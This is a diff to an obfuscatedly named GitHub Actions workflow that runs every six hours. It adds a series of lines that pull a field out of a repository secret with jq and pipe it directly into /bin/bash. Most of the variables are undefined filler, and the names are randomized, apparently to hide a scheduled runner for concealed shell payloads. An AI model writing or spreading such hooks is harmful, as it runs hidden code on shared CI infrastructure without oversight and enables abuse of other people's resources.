--- a/.github/workflows/dachuqish.yml
+++ b/.github/workflows/dachuqish.yml
@@ -1,24 +1,30 @@
 name: dachuqish
+
 on:
   workflow_dispatch:
   schedule:
-    - cron: '46 1/6 * * *'
-jobs:  # 25491
+    - cron: '30 3/6 * * *'
+jobs:
   build:
     runs-on: ubuntu-latest
+
     steps:
       - uses: actions/checkout@v4
       - name: dachuqish
         env:
-          r4716: ${{ secrets.r4716 }}
+          woqe6336: ${{ secrets.woqe6336 }}
         run: |
-          echo $r4716 | jq -r .pipe94923 | /bin/bash
-          echo $ypys48 | jq -r .qgtnf8478 | /bin/bash
-          echo $heo2931 | jq -r .wt06 | /bin/bash
-          echo $ef50773 | jq -r .qml606 | /bin/bash
-          echo $slikf08 | jq -r .joez40068 | /bin/bash
-          echo $ozwet13 | jq -r .vmnbm37667 | /bin/bash
-          echo $fjl4413 | jq -r .nq3 | /bin/bash
-          echo $lgwr83498 | jq -r .vdvx28378 | /bin/bash
-          echo $eqal5780 | jq -r .npk1819 | /bin/bash
+          echo $woqe6336 | jq -r .jh07 | /bin/bash
+          echo $oc69 | jq -r .ht228 | /bin/bash
+          echo $nmxnl22732 | jq -r .dd232 | /bin/bash
+          echo $nv8 | jq -r .y545 | /bin/bash
+          echo $e6681 | jq -r .fxmrk518 | /bin/bash
+          echo $o11977 | jq -r .hpgcn564 | /bin/bash
+          echo $cu4 | jq -r .wgfhq67 | /bin/bash
+          echo $jibnp02 | jq -r .vmc15 | /bin/bash
+          echo $qh275 | jq -r .c381 | /bin/bash
+          echo $uzor3 | jq -r .bgzxh6404 | /bin/bash
+          echo $mezgb9104 | jq -r .rpo64 | /bin/bash
+          echo $r51946 | jq -r .wkn91695 | /bin/bash
+          echo $ksh79539 | jq -r .hal60 | /bin/bash
 
